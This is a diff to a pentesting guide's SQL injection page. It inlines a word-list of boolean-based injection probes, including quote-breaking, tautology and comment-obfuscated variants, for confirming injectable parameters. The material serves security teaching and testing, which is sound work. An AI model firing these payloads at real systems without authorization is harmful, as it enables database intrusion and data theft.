true sqli

src/pentesting-web/sql-injection/README.md

@@ -72,9 +72,93 @@ page.asp?id=1 and 1=2 -- results in false
 
 This word-list was created to try to **confirm SQLinjections** in the proposed way:
 
-{{#file}}
-sqli-logic.txt
-{{#endfile}}
+<details>
+<summary>True SQLi</summary>
+```
+true
+1
+1>0
+2-1
+0+1
+1*1
+1%2
+1 & 1
+1&1
+1 && 2
+1&&2
+-1 || 1
+-1||1
+-1 oR 1=1
+1 aND 1=1
+(1)oR(1=1)
+(1)aND(1=1)
+-1/**/oR/**/1=1
+1/**/aND/**/1=1
+1'
+1'>'0
+2'-'1
+0'+'1
+1'*'1
+1'%'2
+1'&'1'='1
+1'&&'2'='1
+-1'||'1'='1
+-1'oR'1'='1
+1'aND'1'='1
+1"
+1">"0
+2"-"1
+0"+"1
+1"*"1
+1"%"2
+1"&"1"="1
+1"&&"2"="1
+-1"||"1"="1
+-1"oR"1"="1
+1"aND"1"="1
+1`
+1`>`0
+2`-`1
+0`+`1
+1`*`1
+1`%`2
+1`&`1`=`1
+1`&&`2`=`1
+-1`||`1`=`1
+-1`oR`1`=`1
+1`aND`1`=`1
+1')>('0
+2')-('1
+0')+('1
+1')*('1
+1')%('2
+1')&'1'=('1
+1')&&'1'=('1
+-1')||'1'=('1
+-1')oR'1'=('1
+1')aND'1'=('1
+1")>("0
+2")-("1
+0")+("1
+1")*("1
+1")%("2
+1")&"1"=("1
+1")&&"1"=("1
+-1")||"1"=("1
+-1")oR"1"=("1
+1")aND"1"=("1
+1`)>(`0
+2`)-(`1
+0`)+(`1
+1`)*(`1
+1`)%(`2
+1`)&`1`=(`1
+1`)&&`1`=(`1
+-1`)||`1`=(`1
+-1`)oR`1`=(`1
+1`)aND`1`=(`1
+```
+</details>
 
 ### Confirming with Timing